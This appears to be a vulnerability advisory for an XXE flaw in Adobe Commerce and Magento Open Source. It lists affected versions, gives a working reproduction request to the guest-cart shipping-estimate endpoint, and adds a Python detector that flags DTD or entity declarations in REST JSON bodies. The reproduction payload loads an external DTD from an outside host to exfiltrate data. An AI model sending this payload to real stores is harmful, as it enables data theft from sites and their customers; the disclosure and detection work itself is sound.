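XXE Vulnerability in Magento Open Source
1. Vulnerability Description
Magento Open Source is a free e-commerce platform developed and maintained by Adobe. It is built on PHP and the Zend Framework and provides a powerful, flexible e-commerce solution. Multiple versions of Adobe Commerce and Magento Open Source contain an XXE (XML External Entity) vulnerability: a malicious attacker may exploit it by supplying a specially crafted XML document to execute commands.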
2. Affected Versions
Adobe Commerce <= 2.4.7
Adobe Commerce <= 2.4.6-p5
Adobe Commerce <= 2.4.5-p7
Adobe Commerce <= 2.4.4-p8
Adobe Commerce <= 2.4.3-ext-7
Adobe Commerce <= 2.4.2-ext-7
Adobe Commerce <= 2.4.1-ext-7
Adobe Commerce <= 2.4.0-ext-7
Adobe Commerce <= 2.3.7-p4-ext-7
Magento Open Source <= 2.4.7
Magento Open Source <= 2.4.6-p5
Magento Open Source <= 2.4.5-p7
Magento Open Source <= 2.4.4-p8
3. Asset Discovery
app="Adobe-Magento"
4. Vulnerability Reproduction
POST /rest/all/V1/guest-carts/test-assetnote/estimate-shipping-methods HTTP/2
Host:
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/json
Content-Length: 274

{
  "address": {
    "totalsReader": {
      "collectorList": {
        "totalCollector": {
          "sourceData": {
            "data": "<?xml version=\"1.0\" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM \"http://oryccaxtmo.dgrh3.cn/dtd.xml\"> %sp; %param1; ]> <r>&exfil;</r>",
            "options": 16
          }
        }
      }
    }
  }
}
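
Detection-side added example (not part of the original write-up, and not Adobe or Magento code): the request above carries an XML document with an inline DTD inside a JSON string, so a check at a WAF or reverse proxy can flag any /rest/ request whose JSON body contains a DOCTYPE or ENTITY declaration at any depth. It assumes request bodies are available for inspection; the function names and the sample bodies (with a placeholder host) are constructed for illustration.

```python
import json
import re

# Markers of an inline DTD or entity declaration inside a JSON string value.
XML_DTD = re.compile(r"<!\s*(DOCTYPE|ENTITY)\b", re.IGNORECASE)
# External identifiers (SYSTEM/PUBLIC) referenced by a declaration.
EXTERNAL = re.compile(r"\b(SYSTEM|PUBLIC)\s+[\"']([^\"']+)[\"']", re.IGNORECASE)


def walk(node, path=""):
    """Yield (json_path, string_value) for every string in a decoded JSON tree."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from walk(value, f"{path}.{key}" if path else key)
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from walk(value, f"{path}[{i}]")
    elif isinstance(node, str):
        yield path, node


def inspect_body(uri, body):
    """Return findings for a REST request whose JSON body embeds an XML DTD."""
    if not uri.startswith("/rest/"):
        return []
    try:
        tree = json.loads(body)
    except ValueError:
        return []  # not JSON: out of scope for this check
    findings = []
    for path, value in walk(tree):
        if XML_DTD.search(value):
            refs = [m.group(2) for m in EXTERNAL.finditer(value)]
            findings.append({"uri": uri, "path": path, "external_refs": refs})
    return findings


# Constructed samples: one body shaped like the request on this page (placeholder
# host), and one ordinary shipping-estimate body.
SUSPICIOUS = json.dumps({"address": {"totalsReader": {"collectorList": {"totalCollector": {
    "sourceData": {"data": '<?xml version="1.0" ?> <!DOCTYPE r [ <!ENTITY % sp SYSTEM '
                           '"http://dtd.example.invalid/dtd.xml"> %sp; ]> <r/>',
                   "options": 16}}}}}})
BENIGN = json.dumps({"address": {"country_id": "US", "postcode": "10001"}})
URI = "/rest/all/V1/guest-carts/abc123/estimate-shipping-methods"

if __name__ == "__main__":
    for body in (SUSPICIOUS, BENIGN):
        print(inspect_body(URI, body))
```

The JSON path in each finding shows which nested property carried the XML, and the external references are candidates for outbound-connection review in egress logs.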